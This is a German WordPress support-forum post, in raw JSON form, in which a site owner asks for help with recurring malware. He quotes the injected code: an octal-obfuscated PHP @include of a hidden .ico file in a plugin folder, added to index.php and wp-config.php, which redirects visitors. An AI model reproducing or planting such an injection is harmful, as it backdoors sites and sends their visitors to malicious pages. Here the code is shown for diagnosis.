{"id":79237,"date":"2020-03-16T14:40:24","date_gmt":"2020-03-16T13:40:24","guid":{"rendered":"https:\/\/de.wordpress.org\/support\/topic\/hack-redirect-wenn-die-seite-via-google-zum-ersten-mal-aufgerufen-wird\/"},"modified":"2020-03-16T15:59:16","modified_gmt":"2020-03-16T14:59:16","slug":"hack-redirect-wenn-die-seite-via-google-zum-ersten-mal-aufgerufen-wird","status":"publish","type":"topic","link":"https:\/\/de.wordpress.org\/support\/topic\/hack-redirect-wenn-die-seite-via-google-zum-ersten-mal-aufgerufen-wird\/","title":{"rendered":"Hack: Redirect wenn die Seite via Google zum ersten Mal aufgerufen wird"},"content":{"rendered":"<p>Hallo zusammen,<\/p>\n<p>ich habe ein sehr merkw\u00fcrdiges Ph\u00e4nomen. Bei manchen Seiten beobachte ich einen Hack, bei welcher die index.php, die wp-config.php und die wp-settings.php mit folgendem Code in den ersten Zeilen ver\u00e4ndert wird:<\/p>\n<pre><code>\/*1a0f6*\/\n\n@include &quot;\\057va\\162\/w\\167w\/\\166ho\\163ts\\057co\\155mo\\164io\\156.o\\156li\\156e\/\\155ei\\156pi\\154at\\145s.\\144e\/\\167p-\\143on\\164en\\164\/p\\154ug\\151ns\\057li\\166em\\145sh\\055si\\164eo\\162ig\\151n-\\167id\\147et\\163\/.\\145c9\\06376\\0667.\\151co&quot;;\n\n\/*1a0f6*\/<\/code><\/pre>\n<p>Ich habe schon beobachtet, dass hier eine .ico Datei inkludiert wird, die in Wahrheit jedoch eine Weiterleitung zu einer omin\u00f6sen Seite beinhaltet. Ich habe die .ico Dateien schon mehrfach gel\u00f6scht und die index.php, die wp-config.php und die wp-settings.php wiederhergestellt. Doch nach 1-2 Tagen wurde die Seite erneut gehackt und die Bereinigung geht von vorne los. Folgende Dinge habe ich bereits unternommen, um diesem Problem entgegenzuwirken. Doch bislang alles ohne Erfolg:<\/p>\n<ul>\n<li>chmod so ver\u00e4ndert, dass die Dateien nicht mehr bearbeitet werden k\u00f6nnen<\/li>\n<li>Plugin Stealth Login Page<\/li>\n<li>Passw\u00f6rter der Benutzer ver\u00e4ndert (alle!)<\/li>\n<li>Passw\u00e4rter von FTP und Datenbank ver\u00e4ndert<\/li>\n<li>Der Support vom Hoster hatte auch keine Idee mehr<\/li>\n<\/ul>\n<p>Ihr seid meine letzte Hoffnung. Habt ihr eine Idee, wie es dem Angreifer gelingt st\u00e4ndig die Dateien zu manipulieren? Habt ihr Ideen wie ich das unterbinden kann?<\/p>\n<p>Ich freue mich \u00fcber jeglichen Hinweis und jede Hilfe.<\/p>\n<p>Liebe Gr\u00fc\u00dfe,<br \/>\nMaxim<\/p>\n","protected":false},"template":"","class_list":["post-79237","topic","type-topic","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/79237","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/topic"}],"about":[{"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/types\/topic"}],"version-history":[{"count":1,"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/79237\/revisions"}],"predecessor-version":[{"id":79238,"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/79237\/revisions\/79238"}],"wp:attachment":[{"href":"https:\/\/de.wordpress.org\/support\/wp-json\/wp\/v2\/media?parent=79237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}